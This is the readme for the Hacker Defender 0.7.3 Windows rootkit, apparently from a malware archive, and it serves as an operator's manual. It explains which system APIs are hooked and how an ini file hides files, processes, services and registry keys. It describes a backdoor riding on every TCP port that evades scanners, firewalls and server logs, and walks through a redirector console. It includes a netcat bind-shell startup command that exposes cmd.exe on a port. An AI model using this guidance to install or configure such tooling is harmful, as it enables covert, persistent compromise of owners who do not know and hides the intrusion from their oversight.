Hacker defender 0.7.3
(Backdoor.HacDef.073.a)

by Holy_Father

Written in Delphi & Assembly

Released in october 2003

Made in Czechoslovakia

more versions


Hacker defender v0.7.3
======================
Hacker defender is rootkit for Windows NT 4.0, Windows 2000 and Windows XP.
Main code was written in Delphi 6. New functions are written in assembler. 
Backdoor and redirector clients are coded mostly in Delphi 6.

program uses adapted LDE32
LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000 Z0MBiE
special edition for REVERT tool
version 1.05

program uses Superfast/Supertiny Compression/Encryption library
Superfast/Supertiny Compression/Encryption library.
(c) 1998 by Jacky Qwerty/29A.


Usage
-----

>hxdef073.exe [inifile]
or 
>hxdef073.exe [switch] 

	Default EXENAME.ini where EXENAME is the name of executable of main 
program without extension is used if run without specifying the inifile or 
if run with switch (so default inifile is hxdef073.ini).
	These switches are available:

        -:refresh       -       use to update settings from inifile
        -:noservice     -       doesn't install services and run normally
        -:installonly   -       only install service, but not run

Example:
>hxdef073.exe -:refresh


Idea
----

	The main idea of this program is to rewrite few memory segments in all
running process. Rewriting of some basic modules cause changes in processes 
behaviour. Rewriting must not affect the stability of the system or running
process.
	Program must be absolutely hidden for all others. Now the user is able
to hide files, process, system services, registry keys and values. Program 
masks changes in memory. Program installs hidden backdoors and register as 
hidden system service. The technology of backdoor allowed to do the 
implantation of redirector.


Licence
-------

	Till version 1.0.0 it is freeware. It can be spread but not changed
and all copies must includes all files (including original readme files).
The only exception is when target person (and computer owner) wouldn't know 
about the copy. 
	This project will be open source in version 1.0.0.


Version
-------

TODO    -       unify backdoor, redirector and file manager
        -       code ring0 driver
        -       hide open ports
	-	hiding for remote users
        -       backdoor proxy support
        -       exefile binary compression

0.7.3   +       direct hooking method
        +       hiding files via NtQueryDirectoryFile hook
        +       hiding files in ntvdm via NtVdmControl hook
        +       new process hooking via NtResumeThread hook
        +       process infection via LdrInitializeThunk hook
        +       reg keys hiding via NtEnumerateKey hook
	+	reg values hiding via NtEnumerateValueKey hook
	+	dll infection via LdrLoadDll hook
        +       more settings in inifile
        +       safemode support
	+	masking memory change in processes via NtReadVirtualMemory hook
        x       fixed debugger bug
        x       fixed w2k MSTS bug
        x       found and fixed zzZ-service bug

0.5.1	+	never more hooking WSOCK 
	x	fixed bug with MSTS

0.5.0	+	low level redir based on backdoor technique
	+	password protection
	+	name of inifile depends on exefile name
	+	backdoor stability improved
	-	redirectors conection speed is limited about 256 kBps,
		imperfect implementation of redirector,
		imperfect design of redirector
	-	found chance to detect rootkit with symbolic link objects
	-	found bug in connection with MS Termnial Services
	-	found bug in hidding files in 16-bit applications
	x	found and fixed bug in services enumeration
	x	found and fixed bug in hooking servers

0.3.7	+	possibility to change settings during running
	+	wildcard in names of hidden files, process and services
	+	possibility to add programs to rootkit startup
	x	fixed bug in hidding services on Windows NT 4.0

0.3.3	+	stability realy improved
	x	fixed all bugs for Windows XP
        x	found and fixed bug in hiding in registry
	x	found and fixed bug in backdoor with more clients

0.3.0	+	connectivity, stability and functionality of backdoor improved 
	+	backdoor shell runs always on system level 
	+	backdoor shell is hidden 
	+	registry keys hiding
	x	found and fixed bug in root processes
	-	bug in XP after reboot

0.2.6	x	fixed bug in backdoor

0.2.5	+	fully interactive console
	+	backdoor identification key is now only 256 bits long
	+	improved backdoor installation
	-	bug in backdoor

0.2.1	+	always run as service

0.2.0	+	system service installation 
	+	hiding in database of installed services 
	+	hidden backdoor
	+	no more working with windows

0.1.1	+	hidden in tasklist
	+	usage - possibility to specify name of inifile
	x	found and then fixed bug in communication
	x	fixed bug in using advapi
	-	found bug with debuggers

0.1.0	+	infection of system services
	+	smaller, tidier, faster code, more stable program
	x	fixed bug in communication

0.0.8	+	hiding files
	+	infection of new processes
	-	can't infect system services
	-	bug in communication



Hooked API
----------

List of API functions which are changed:

Kernel32.ReadFile
Ntdll.NtQuerySystemInformation (class 5)
Ntdll.NtQueryDirectoryFile
Ntdll.NtVdmControl
Ntdll.NtResumeThread
Ntdll.NtEnumerateKey
Ntdll.NtEnumerateValueKey
Ntdll.NtReadVirtualMemory
Ntdll.NtLdrLoadDll
Ntdll.NtLdrInitializeThunk
WS2_32.recv
WS2_32.WSARecv
Advapi32.EnumServiceGroupW
Advapi32.EnumServicesStatusExW
Advapi32.EnumServicesStatusExA
Advapi32.EnumServicesStatusA


Inifile
-------

	Inifile must contain seven parts: [Hidden Table], [Root Processes], 
[Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], 
[Settings]. In [Hidden Table], [Root Processes], [Hidden Services] and newly 
also in [Hidden RegValues] can be used character * as the wildcard in place of 
strings end. Asterisk can be used only on strings end, everything after first 
asterisks is ignored. 

Example:
[Hidden Table]
hxdef*

this will hide all files, dirs and processes which name start with "hxdef".

	Hidden Table is a list of files and directories which should be hidden.
There is no chance to find those files and directories. Programs in this list 
will be hidden in tasklist.
	Root Processes is a list of programs which will be immune against 
infection. You can see hidden files, directories and programs only with these 
root programs. So, root processes are for rootkit admins.
	Hidden Services is a list of service names which will be hidden 
in the database of installed services. Service name for the main rootkit 
program is HackerDefender073.
	Hidden RegKeys is a list of registry keys which will be hidden. Rootkit
has two keys in registry: HackerDefender073 and LEGACY_HACKERDEFENDER073.
	Hidden RegValues is a list of registry values which will be hidden.
	Startup Run is a list of programs which	rootkit run after its startup.
These programs will have same rights as rootkit. Program name is divided from 
its arguments with question tag. Do not use " characters.

Example:
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe

netcat-shell is run after rootkit startup and listens on port 100

	

	Settings contain five values. Password is 16 character string which is 
used when working with backdoor or redirector. Password can be shorter, rest 
is filled with spaces. BackdoorShell is name for copy of the shell which is 
created by backdoor. ServiceName is the name of rootkit service. DisplayName is
the display name of service. ServiceDescription is the description of service.

Example:
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdef�$.exe
ServiceName=HackerDefender073
DisplayName=HXD Service 073
ServiceDescription=powerful NT rootkit


Backdoor
--------

	Rootkit hooks some API functions connected with receiving packets 
from the net. If incoming data equals to 256 bits long key, password 
and service are verified, the copy of a shell is created in a temp, its 
instance is created and next incoming data are redirected to this shell.
	Because rootkit hooks all process in the system all TCP ports on all
servers will be backdoors. This backdoor will work only on servers where 
incoming buffer is larger or equal to 256 bits. But this feature is on almost 
all standard servers like Apache, IIS, Oracle. So, backdoor is created and it 
is hidden because its packets go through common servers on the system. So, you 
are not able to find it with classic portscanner and this backdoor can easily 
go through firewall. Exception in this are classic proxies which are protocol 
oriented for e.g. FTP or HTTP.
	During tests on IIS services was found that HTTP server does not log 
any of this connection, FTP and SMTP servers log only disconnection at the end.
	You have to use special client if want to connect to the backdoor. 
Program bdcli073.exe is used for this.

usage: bdcli073.exe host port

	Client for version 0.7.3 is not compatible with servers in older 
version than 0.5.0.


Redirector
----------

	Redirector is based on backdoor technology. First connection packets
are same as in backdoor connection. Next packets are special packets for 
redirector only. These packets are made by redirectors base which is run
on users computer. First packet of redirected connection defines target server
and port.
	The redirectors base saves its settings into its inifile which name 
depends on base exefile name (so default is rdrbs073.ini). If this file doesn't
exist when base is run, it is created automatically. It is better not to modify
this inifile externaly. All settings can be changed from base console.
	If we want to use redirector on server where rootkit is installed,
we have to run redirectors base on localhost before. Then in base console we 
have to create mapped port routed to server with rootkit. Finally we can 
connect on localhost base on chosen port and transfering data. Redirected data 
are coded with rootkit password. In this version connection speed is limited
with about 2156 kBps. Redirector is not determined to be used for hispeed 
connections. Redirector is also limited with system where rootkit run. 
Redirector works with TCP protocol.
	In this version the base is controled with 19 commands. These are not
case sensitive. Their function is described in HELP command. During the base
startup are executed commands in startup-list. Startup-list commands are edited
with commands which start with SU.
	Redirector differentiate between two connection types (HTTP and other).
If connection is other type packets are not changed. If it is HTTP type Host
parametr in HTTP header is changed to the target server. Maximum redirectors
count on one base is 1000.
	Redirector base fully works only on NT boxes. Only on NT program has
tray icon and you can hide console with HIDE command. Only on NT base can be
run in silent mode where it has no output, no icon and it does only commands 
in startup-list.

Examples:
1) getting mapped port info

        >MPINFO
        No mapped ports in the list.

2) add command MPINFO to startup-list and get startup-list commands:

	>SUADD MPINFO
	>sulist
	0) MPINFO

3) using of HELP command:

	>HELP
	Type HELP COMMAND for command details.
	Valid commands are:
	HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL, 
	DETAIL,	SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
	>HELP ADD
	Create mapped port. You have to specify domain when using HTTP type.
	usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET 
	SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]
	>HELP EXIT
	Kill this application. Use DIS flag to discard unsaved data.
	usage: EXIT [DIS]

4) add mapped port, we want to listen on localhost on port 100, rootkit
is installed on server 200.100.2.36 on port 80, target server is www.google.com 
on port 80, rootkits password is bIgpWd, connection type is HTTP, ip address
of target server (www.google.com) - we always have to know its ip - is 
216.239.53.100:

	>ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com

command ADD can be run without parameters, in this case we are asked for every
parameter separately

5) now we can check mapped ports again with MPINFO:
	
	>MPINFO
	There are 1 mapped ports in the list. Currently 0 of them open.

6) enumeration of mapped port list:

	>LIST
	000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP

7) datailed description of one mapped port:
	
	>DETAIL 0
	Listening on port: 100
	Mapping server address: 200.100.2.36
	Mapping server port: 80
	Target server address: 216.239.53.100
	Target server port: 80
	Password: bIgpWd
	Port type: HTTP
	Domain name for HTTP Host: www.google.com
	Current state: CLOSED

8) we can test whether the rootkit is installed with out password on mapping 
server 200.100.2.36 (but this is not needed if we are sure about it):

	>TEST 0
	Testing 0) 200.100.2.36:80:bIgpWd - OK

if test failed it returns
	
	Testing 0) 200.100.2.36:80:bIgpWd - FAILED

9) port is still closed and before we can use it, we have to open it with OPEN
command, we can close port with CLOSE command when it is open, we can use flag
ALL when want to apply these commands on all ports in the list, current state 
after required action is written after a while:
	
	>OPEN 0
	Port number 0 opened.
	>CLOSE 0
	Port number 0 closed.

or

	>OPEN ALL
	Port number 0 opened.
	
10) to save current settings and lists we can use SAVE command, this saves
all to inifile (saving is also done by command EXIT without DIS flag):
	
	>SAVE
	Saved successfully.


Open port is all what we need for data transfer. Now you can open your 
favourite explorer and type http://localhost:100/ as url. If no problems you
will see how main page on www.google.com is loaded.
	First packets of connection can be delayed up to 5 seconds, but others
are limited only by speed of server, your internet connection speed and by
redirector technology which is about 256 kBps in this version.


Tests
-----

	Basic installation was tested without other bugs on:

 MS Windows XP [Verze 5.1.2600] SP1,
 MS Windows XP [Verze 5.1.2600],
 MS Windows 2000 Server 5.00.2195,
 MS Windows 2000 5.00.2195 SP3,
 MS Windows 2000 5.00.2195 SP2,
 MS Windows 2000 5.00.2195,
 MS Windows 2000 5.00.2072,
 MS Windows NT 4.0.1381 Server SP6a
 MS Windows NT 4.0.1381 SP6a

	Backdoor and redirector were tested and run perfectly on:

 MS IIS 5.1 WWW, FTP, SMTP,
 MS IIS 5.0 WWW, FTP, SMTP,
 MS IIS 3.0 WWW

        Redirectors base works perfectly only on NT boxes.


Known Bugs
----------

	THERE ARE NO KNOWN BUGZ IN THIS VERSION !!!
	(quiz: is this the first version without known bug ?)


Files
-----

original archive contains these files:

hxdef073.exe	50 688 b	- program Hacker defender v0.7.3
hxdef073.ini	 1 661 b	- inifile with default settings
bdcli073.exe	30 208 b	- backdoor client
rdrbs073.exe	48 640 b	- redirectors base
readmecz.txt	15 553 b	- czech version of help file
readmeen.txt	15 523 b	- this help file

Holy_Father

MegaSecurity